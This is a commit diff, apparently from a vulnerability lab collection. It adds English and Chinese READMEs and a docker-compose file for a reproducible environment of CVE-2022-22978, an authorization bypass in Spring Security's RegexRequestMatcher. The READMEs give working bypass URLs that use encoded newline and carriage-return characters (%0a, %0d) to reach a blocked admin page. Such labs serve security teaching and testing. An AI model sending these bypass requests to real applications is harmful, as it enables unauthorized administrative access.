first commit

spring/CVE-2022-22978/README.md

@@ -0,0 +1,31 @@
+# Spring Security Authorization Bypass in RegexRequestMatcher (CVE-2022-22978)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+The Spring Security framework is used to provide security authentication functionality in the Spring framework. In Spring Security versions 5.5.6 and 5.6.3 and older unsupported versions, applications using RegexRequestMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass.
+
+References:
+
+- <https://tanzu.vmware.com/security/cve-2022-22978>
+- <https://github.com/DeEpinGh0st/CVE-2022-22978>
+
+## Vulnerability Environment
+
+Execute the following command to start a Web application based on Spring Security 5.6.3:
+
+```
+docker compose up -d
+```
+
+After the server starts, browse to <http://your-ip:8080/admin> to see that access to the admin page is blocked.
+
+![](forbidden.png)
+
+## Vulnerability Reproduce
+
+Send the following request to access the admin page that bypassed the authentication:
+
+- <http://your-ip:8080/admin/%0atest>
+- <http://your-ip:8080/admin/%0dtest>
+
+![](bypassed.png)

spring/CVE-2022-22978/README.zh-cn.md

@@ -0,0 +1,29 @@
+# Spring Security RegexRequestMatcher 认证绕过漏洞（CVE-2022-22978）
+
+Spring Security用于在Spring框架中提供安全认证功能。在Spring Security 5.5.6、5.6.3及更早的不受支持版本中，使用带有`.`的正则表达式的RegexRequestMatcher的应用程序可能存在认证绕过漏洞。
+
+参考链接：
+
+- <https://tanzu.vmware.com/security/cve-2022-22978>
+- <https://github.com/DeEpinGh0st/CVE-2022-22978>
+
+## 漏洞环境
+
+执行如下命令启动一个基于Spring Security 5.6.3的Web应用：
+
+```
+docker compose up -d
+```
+
+服务器启动后，访问<http://your-ip:8080/admin>，可以看到管理页面的访问被阻止。
+
+![](forbidden.png)
+
+## 漏洞复现
+
+发送以下请求来访问管理页面，成功绕过认证：
+
+- <http://your-ip:8080/admin/%0atest>
+- <http://your-ip:8080/admin/%0dtest>
+
+![](bypassed.png)

spring/CVE-2022-22978/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ spring-security:
+   image: vulhub/spring-security:5.6.3
+   ports:
+    - "8080:8080"